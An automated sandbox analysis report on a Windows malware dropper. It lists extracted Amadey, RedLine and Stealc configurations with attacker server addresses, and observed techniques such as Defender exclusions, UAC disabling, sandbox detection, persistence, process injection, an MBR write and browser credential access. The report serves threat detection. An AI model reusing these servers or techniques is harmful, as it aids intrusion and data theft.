Analysis
max time kernel: 149s
max time network: 153s
platform: windows11-21h2_x64
resource: win11-20240508-en
resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 30-05-2024 03:45
Static task: static1
Behavioral task: behavioral1
  Sample: 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
  Resource: win10v2004-20240426-en
Behavioral task: behavioral2
  Sample: 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
  Resource: win11-20240508-en
General
Target: 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
Size: 1.8MB
MD5: 98f52b2094aaa94c5f50bd4aecdca2f6
SHA1: b02fcc648aeca6fcf0c1ba6ef23c9da2161911a1
SHA256: 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b
SHA512: 258f21b37a81095af661b859be3dfea6f9ed00ad434e0ce000693660ed1551bab52596020b83459de2b19031cd7c00d2c6b6b8a1232d69866cd6acd40ad524cf
SSDEEP: 49152:g+dbG+v3neNMlVIoaqqNhiRMU6Al0XyFgdKitw:guiieNMDSqshSMU6Al0Ai
Malware Config
Extracted: amadey
  4.21
  0e6740
  http://147.45.47.155
  install_dir: 9217037dc9
  install_file: explortu.exe
  strings_key: 8e894a8a4a3d0da8924003a561cfb244
  url_paths: /ku4Nor9/index.php
Extracted: amadey
  4.21
  49e482
  http://147.45.47.70
  install_dir: 1b29d73536
  install_file: axplont.exe
  strings_key: 4d31dd1a190d9879c21fac6d87dc0043
  url_paths: /tr8nomy/index.php
Extracted: redline
  1
  185.215.113.67:40960
Extracted: redline
  @LOGSCLOUDYT_BOT
  185.172.128.33:8970
Extracted: stealc
  zzvv
  http://23.88.106.134
  url_path: /c73eed764cc59dcb.php
Signatures
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | 9J1eQpa2VXXz30Zr9qHarAe1.exe
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload 4 IoCs
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe | family_redline
behavioral2/memory/2028-120-0x0000000000370000-0x00000000003C2000-memory.dmp | family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | family_redline
behavioral2/memory/2592-179-0x0000000000DD0000-0x0000000000E22000-memory.dmp | family_redline
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | file300un.exe
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | 9J1eQpa2VXXz30Zr9qHarAe1.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | file300un.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" | file300un.exe
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 12 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explortu.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplont.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 7c602150df.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explortu.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explortu.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 9J1eQpa2VXXz30Zr9qHarAe1.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplont.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 428002730b.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplont.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | axplont.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | explortu.exe
Blocklisted process makes network request 1 IoCs
Processes:
flow | pid | process
118 | 5624 | rundll32.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
pid | process
2836 | powershell.exe
5480 | powershell.exe
4488 | powershell.exe
5544 | powershell.exe
1164 | powershell.EXE
4948 | powershell.exe
4164 | powershell.exe
Downloads MZ/PE file
Checks BIOS information in registry 2 TTPs 26 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 428002730b.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplont.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 428002730b.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplont.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 9J1eQpa2VXXz30Zr9qHarAe1.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 7c602150df.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplont.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplont.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 9J1eQpa2VXXz30Zr9qHarAe1.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplont.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | axplont.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | explortu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplont.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 7c602150df.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | axplont.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Control Panel\International\Geo\Nation | OXjBook.exe
Drops startup file 7 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fcZTz4kOrMNOmQeQdqZCgXMO.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xjWtMlWbaf24r8rMr0eKGPZY.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4zVKBf88L4glCOcQQhuoJETT.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9FqxZ1Vgffg8VIdUqs2YeVOO.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RNrwpVBh2tbDd6dStrGxaIyT.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\skXHsrY0Sm7TvXknOijWricu.bat | installutil.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Task Manager.lnk | 7GB8EE4ovuV7PRbpqsq3NaNR.exe
Executes dropped EXE 27 IoCs
Processes:
pid | process
4744 | explortu.exe
3596 | 428002730b.exe
3160 | axplont.exe
960 | axplont.exe
3416 | 7c602150df.exe
1736 | explortu.exe
2364 | 33333.exe
2028 | fileosn.exe
4856 | One.exe
2592 | svhoost.exe
2328 | lumma1234.exe
4936 | gold.exe
3096 | swizzzz.exe
904 | file300un.exe
3660 | aVQ0bCqrBKF4mc5oy5N4ZcJW.exe
4188 | 50GOjmdgQviYZtho8Vpb8ZVk.exe
4996 | 7GB8EE4ovuV7PRbpqsq3NaNR.exe
4352 | axplont.exe
2288 | explortu.exe
3136 | PPSVNmeA5Lq8uO8faTZH5Y7p.exe
5156 | Install.exe
4484 | Install.exe
3104 | 9J1eQpa2VXXz30Zr9qHarAe1.exe
4620 | Install.exe
5808 | axplont.exe
2060 | explortu.exe
3420 | OXjBook.exe
Identifies Wine through registry keys 2 TTPs 11 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
description | ioc | process
Key opened | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine | explortu.exe
Key opened | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine | axplont.exe
Key opened | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine | explortu.exe
Key opened | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine | axplont.exe
Key opened | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine | explortu.exe
Key opened | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine | 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
Key opened | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine | 428002730b.exe
Key opened | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine | axplont.exe
Key opened | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine | 7c602150df.exe
Key opened | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine | axplont.exe
Key opened | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Wine | explortu.exe
Loads dropped DLL 2 IoCs
Processes:
pid | process
4188 | 50GOjmdgQviYZtho8Vpb8ZVk.exe
5624 | rundll32.exe
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Processes:
resource | yara_rule
C:\Users\Admin\Pictures\9J1eQpa2VXXz30Zr9qHarAe1.exe | themida
behavioral2/memory/3104-521-0x0000000140000000-0x000000014159C000-memory.dmp | themida
behavioral2/memory/3104-628-0x0000000140000000-0x000000014159C000-memory.dmp | themida
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions | file300un.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" | file300un.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | 9J1eQpa2VXXz30Zr9qHarAe1.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | file300un.exe
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\7c602150df.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\7c602150df.exe" | explortu.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | file300un.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 9J1eQpa2VXXz30Zr9qHarAe1.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | file300un.exe
Drops Chrome extension 2 IoCs
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json | OXjBook.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json | OXjBook.exe
Drops desktop.ini file(s) 1 IoCs
Processes:
description | ioc | process
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | Install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
73 | api.myip.com
73 | ipinfo.io
95 | api.myip.com
96 | ipinfo.io
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
description | ioc | process
File opened for modification | \??\PhysicalDrive0 | 50GOjmdgQviYZtho8Vpb8ZVk.exe
Drops file in System32 directory 35 IoCs
Processes:
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 | OXjBook.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | Install.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | OXjBook.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | 9J1eQpa2VXXz30Zr9qHarAe1.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | OXjBook.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | 9J1eQpa2VXXz30Zr9qHarAe1.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 | OXjBook.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | OXjBook.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | 9J1eQpa2VXXz30Zr9qHarAe1.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 | OXjBook.exe
File opened for modification | C:\Windows\System32\GroupPolicy | 9J1eQpa2VXXz30Zr9qHarAe1.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | OXjBook.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 13 IoCs
Processes:
pid | process
4736 | 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
4744 | explortu.exe
3596 | 428002730b.exe
3160 | axplont.exe
960 | axplont.exe
3416 | 7c602150df.exe
1736 | explortu.exe
4352 | axplont.exe
2288 | explortu.exe
3104 | 9J1eQpa2VXXz30Zr9qHarAe1.exe
3104 | 9J1eQpa2VXXz30Zr9qHarAe1.exe
5808 | axplont.exe
2060 | explortu.exe
Suspicious use of SetThreadContext 8 IoCs
Processes:
description | pid | process | target process
PID 2364 set thread context of 3744 | 2364 | 33333.exe | RegAsm.exe
PID 2328 set thread context of 4168 | 2328 | lumma1234.exe | RegAsm.exe
PID 4936 set thread context of 764 | 4936 | gold.exe | RegAsm.exe
PID 3096 set thread context of 2536 | 3096 | swizzzz.exe | RegAsm.exe
PID 904 set thread context of 1032 | 904 | file300un.exe | installutil.exe
PID 3660 set thread context of 960 | 3660 | aVQ0bCqrBKF4mc5oy5N4ZcJW.exe | AddInProcess32.exe
PID 3660 set thread context of 5612 | 3660 | aVQ0bCqrBKF4mc5oy5N4ZcJW.exe | AddInProcess32.exe
PID 960 set thread context of 5676 | 960 | AddInProcess32.exe | InstallUtil.exe
Drops file in Program Files directory 14 IoCs
Processes:
description | ioc | process
File created | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | OXjBook.exe
File created | C:\Program Files (x86)\JipyTrDkU\UiiHDSk.xml | OXjBook.exe
File created | C:\Program Files (x86)\tegRANPZONsU2\rDCnQNL.xml | OXjBook.exe
File created | C:\Program Files (x86)\JipyTrDkU\SwrKqm.dll | OXjBook.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja | OXjBook.exe
File created | C:\Program Files (x86)\nFLFFjqrQPUn\GIAdIKh.dll | OXjBook.exe
File created | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | OXjBook.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi | OXjBook.exe
File created | C:\Program Files (x86)\krdeMCnRKomDOvwVunR\ssadNvB.dll | OXjBook.exe
File created | C:\Program Files (x86)\krdeMCnRKomDOvwVunR\sEZDWbs.xml | OXjBook.exe
File created | C:\Program Files (x86)\YLgKyOFzWxOqC\mIEObIY.dll | OXjBook.exe
File opened for modification | C:\Program Files\Mozilla Firefox\browser\omni.ja.bak | OXjBook.exe
File created | C:\Program Files (x86)\tegRANPZONsU2\lSxwxrPKOqOmJ.dll | OXjBook.exe
File created | C:\Program Files (x86)\YLgKyOFzWxOqC\TMmVTFJ.xml | OXjBook.exe
Drops file in Windows directory 6 IoCs
Processes:
description | ioc | process
File created | C:\Windows\Tasks\explortu.job | 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe
File created | C:\Windows\Tasks\axplont.job | 428002730b.exe
File created | C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job | schtasks.exe
File created | C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job | schtasks.exe
File created | C:\Windows\Tasks\jiLwFdOzPPQiWLm.job | schtasks.exe
File created | C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job | schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 5 IoCs
Processes:
pid | pid_target | process | target process
4440 | 2364 | WerFault.exe | 33333.exe
1084 | 4936 | WerFault.exe | gold.exe
5520 | 4620 | WerFault.exe | Install.exe
3116 | 4484 | WerFault.exe | Install.exe
896 | 3420 | WerFault.exe | OXjBook.exe
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | AddInProcess32.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | AddInProcess32.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | AddInProcess32.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | RegAsm.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | RegAsm.exe
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
4108 | schtasks.exe
1292 | schtasks.exe
5152 | schtasks.exe
2052 | schtasks.exe
5628 | schtasks.exe
1936 | schtasks.exe
5984 | schtasks.exe
904 | schtasks.exe
5956 | schtasks.exe
5292 | schtasks.exe
Delays execution with timeout.exe 1 IoCs
Processes:
pid | process
4444 | timeout.exe
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | rundll32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
| description | ioc | process |
| --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | fileosn.exe |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = [certificate blob omitted] | fileosn.exe |
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
| pid | process | events |
| --- | --- | --- |
| 4736 | 6750714851cc8c3c97b817017b1acb229035db37f594087584cc528c71383c6b.exe | 2 |
| 4744 | explortu.exe | 2 |
| 3596 | 428002730b.exe | 2 |
| 3160 | axplont.exe | 2 |
| 960 | axplont.exe | 2 |
| 3416 | 7c602150df.exe | 2 |
| 1736 | explortu.exe | 2 |
| 2536 | RegAsm.exe | 2 |
| 2592 | svhoost.exe | 2 |
| 2028 | fileosn.exe | 2 |
| 4856 | One.exe | 2 |
| 2836 | powershell.exe | 3 |
| 4188 | 50GOjmdgQviYZtho8Vpb8ZVk.exe | 4 |
| 3660 | aVQ0bCqrBKF4mc5oy5N4ZcJW.exe | 5 |
| 2592 | svhoost.exe | 4 |
| 4352 | axplont.exe | 2 |
| 2288 | explortu.exe | 2 |
| 3660 | aVQ0bCqrBKF4mc5oy5N4ZcJW.exe | 2 |
| 960 | AddInProcess32.exe | 2 |
| 3660 | aVQ0bCqrBKF4mc5oy5N4ZcJW.exe | 2 |
| 960 | AddInProcess32.exe | 3 |
| 5480 | powershell.exe | 3 |
| 4488 | powershell.exe | 3 |
| 2028 | fileosn.exe | 4 |
| 5544 | powershell.exe | 3 |
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
| description | pid | process | events |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | 4856 | One.exe | 1 |
| Token: SeBackupPrivilege | 4856 | One.exe | 1 |
| Token: SeSecurityPrivilege | 4856 | One.exe | 4 |
| Token: SeDebugPrivilege | 904 | file300un.exe | 1 |
| Token: SeDebugPrivilege | 2592 | svhoost.exe | 1 |
| Token: SeDebugPrivilege | 2028 | fileosn.exe | 1 |
| Token: SeDebugPrivilege | 1032 | installutil.exe | 1 |
| Token: SeDebugPrivilege | 2836 | powershell.exe | 1 |
| Token: SeDebugPrivilege | 3660 | aVQ0bCqrBKF4mc5oy5N4ZcJW.exe | 1 |
| Token: SeManageVolumePrivilege | 4188 | 50GOjmdgQviYZtho8Vpb8ZVk.exe | 1 |
| Token: SeDebugPrivilege | 960 | AddInProcess32.exe | 1 |
| Token: SeDebugPrivilege | 3744 | RegAsm.exe | 1 |
| Token: SeDebugPrivilege | 5480 | powershell.exe | 1 |
| Token: SeDebugPrivilege | 4488 | powershell.exe | 1 |
| Token: SeIncreaseQuotaPrivilege | 4644 | WMIC.exe | 2 |
| Token: SeSecurityPrivilege | 4644 | WMIC.exe | 2 |
| Token: SeTakeOwnershipPrivilege | 4644 | WMIC.exe | 2 |
| Token: SeLoadDriverPrivilege | 4644 | WMIC.exe | 2 |
| Token: SeSystemProfilePrivilege | 4644 | WMIC.exe | 2 |
| Token: SeSystemtimePrivilege | 4644 | WMIC.exe | 2 |
| Token: SeProfSingleProcessPrivilege | 4644 | WMIC.exe | 2 |
